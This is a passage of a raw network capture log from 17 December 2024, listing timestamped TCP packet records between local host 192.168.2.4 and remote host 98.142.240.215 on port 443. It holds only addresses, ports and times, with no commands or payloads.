                                                                                                                                                                              Dec 17, 2024 18:12:30.269203901 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.269241095 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.272114038 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.272176027 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.272183895 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.272222042 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.275310040 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.275396109 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.275403023 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.275443077 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.279179096 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.279239893 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.279246092 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.279285908 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.283143997 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.283205032 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.283210993 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.283250093 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.285877943 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.286042929 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.286051989 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.286106110 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.322175980 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.322293997 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.322318077 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.322393894 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.325628996 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.325700998 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.325709105 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.325751066 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.436162949 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.436395884 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.436429024 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.436494112 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.439167976 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.439254999 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.439270020 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.439310074 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.442394018 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.442457914 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.442466974 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.442502022 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.445214987 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.445303917 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.445319891 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.445360899 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.448688030 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.448766947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.448780060 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.448822021 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.451535940 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.451634884 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.451652050 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.451695919 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.456053019 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.456126928 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.456146955 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.456190109 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.459002018 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.459064007 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.459079981 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.459119081 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.462284088 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.462382078 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.462397099 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.462439060 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.465450048 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.465533972 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.465548038 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.465585947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.468034983 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.468131065 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.468144894 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.468189001 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.471055031 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.471134901 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.471147060 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.471189976 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.474483013 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.474561930 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.474576950 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.474617958 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.511900902 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.511995077 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.512063026 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.512110949 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.514527082 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.514611006 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.514647007 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.514699936 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.623248100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.623394966 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.623447895 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.623498917 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.625967026 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.626048088 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.626070023 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.626111031 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.629232883 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.629312992 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.629331112 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.629373074 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.632433891 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.632524014 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.632539988 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.632580996 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.636265039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.636346102 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.636360884 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.636401892 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.639219999 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.639301062 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.639333963 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.639378071 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.642503977 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.642590046 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.642610073 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.642656088 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.646394014 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.646481037 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.646498919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.646544933 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.649841070 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.649930000 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.649946928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.649987936 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.652695894 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.652772903 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.652789116 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.652828932 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.656508923 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.656600952 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.656615019 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.656656981 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.659691095 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.659768105 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.659780979 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.659821033 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.662655115 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.662734985 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.662748098 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.662795067 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.666342020 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.666429996 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.666455984 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.666501045 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.704344034 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.704477072 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.704541922 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.704595089 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.706970930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.707063913 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.707089901 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.707144976 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.816169977 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.816291094 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.816325903 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.816380978 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.818358898 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.818439007 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.818450928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.818502903 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.821307898 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.821398973 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.821408033 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.821455956 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.824191093 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.824286938 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.824300051 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.824357986 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.828068018 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.828156948 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.828166962 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.828213930 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.831433058 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.831552982 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.831562996 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.831634998 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.834322929 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.834460974 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.834467888 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.834547997 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.838192940 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.838310957 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.838318110 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.838393927 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.841576099 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.841696024 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.841702938 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.841778040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.845283985 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.845367908 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.845374107 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.845417976 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.848308086 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.848397017 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.848403931 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.848444939 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.851560116 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.851679087 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.851685047 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.851764917 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.855401039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.855520964 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.855526924 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.855601072 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.858165979 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.858376980 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.858392954 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.858464003 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.896461010 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.896656990 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.896682978 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.896763086 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.898669004 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.898803949 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.898813009 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.898889065 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.007996082 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.008137941 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.008162975 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.008228064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.010699034 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.010814905 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.010821104 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.010896921 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.014096975 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.014214039 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.014219046 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.014301062 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.018021107 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.018137932 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.018143892 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.018233061 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.020791054 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.020899057 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.020905018 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.020950079 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.024210930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.024322033 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.024338961 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.024401903 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.028093100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.028206110 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.028212070 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.028289080 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.031318903 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.031399012 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.031408072 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.031455994 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.034066916 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.034176111 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.034182072 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.034262896 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.039908886 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.040060043 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.040070057 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.040141106 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.041950941 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.042076111 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.042084932 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.042140007 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.044909954 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.044996023 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.045005083 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.045049906 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.048633099 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.048713923 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.048722029 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.048769951 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.051656008 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.051765919 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.051772118 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.051845074 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.110626936 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.110718012 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.110735893 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.110788107 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.113194942 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.113282919 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.113291979 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.113337994 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.224751949 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.224884033 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.224900007 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.224951982 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.228625059 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.228713989 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.228722095 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.228769064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.230928898 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.231050014 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.231069088 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.231151104 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.234313965 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.234396935 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.234405041 CET4434973198.142.240.215192.168.2.4
